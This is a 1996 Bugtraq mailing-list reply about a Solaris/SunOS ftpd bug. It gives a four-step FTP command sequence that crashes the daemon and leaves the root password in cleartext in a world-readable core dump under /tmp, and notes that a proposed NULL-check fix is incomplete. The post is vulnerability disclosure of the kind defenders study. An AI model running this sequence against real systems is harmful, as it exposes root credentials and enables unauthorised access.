[3472] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (Martin Rex)
Wed Oct 16 00:30:06 1996
Date: Tue, 15 Oct 1996 18:14:08 -0400
Reply-To: Martin.Rex@sap-ag.de
From: Martin Rex <martin.rex@sap-ag.de>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199610151521.LAA03025@cam2.gsfc.nasa.gov.> from "James Poland
6-5251" at Oct 15, 96 11:21:35 am
James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
SunOS 5.5:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
-Martin
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so the seem to have used the proposed fix
Checking for "pw != NULL"
So this proposal was simple and obvious ... and incomplete. :)
